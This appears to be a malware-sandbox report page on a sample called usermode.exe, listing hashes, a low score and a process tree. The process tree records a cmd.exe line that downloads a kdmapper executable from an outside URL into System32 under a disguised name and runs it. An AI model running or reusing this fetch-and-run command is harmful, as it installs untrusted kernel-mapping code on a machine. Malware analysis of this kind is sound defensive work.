Overview

overview

10

Static

static

3

usermode.exe

windows7-x64

1

usermode.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    63s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    20/06/2024, 04:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    usermode.exe

  • Size

    571KB

  • MD5

    6ff532b8468ad647aea71708cdf259ff

  • SHA1

    8bf56f629e2c32153ba5037bf981dec868f41ce8

  • SHA256

    7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99

  • SHA512

    4c828064856d29a6530a7b633f4772190ef5d5dd92909ae78610c9319ac9d0f5388e8a15515a824109576d31522d89e06ed88dd1f8e52a8ea058c6e345ea852b

  • SSDEEP

    12288:rWYUNQEMuGIbS2McEqE1CMSD9Opbd0xEY8Q3:pUNiufScEf0H9OpqxL

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usermode.exe
    "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
      2⤵
        PID:2600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2920
        • C:\Windows\system32\certutil.exe
          certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5
          3⤵
            PID:2136
          • C:\Windows\system32\find.exe
            find /i /v "md5"
            3⤵
              PID:1224
            • C:\Windows\system32\find.exe
              find /i /v "certutil"
              3⤵
                PID:2112

          Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads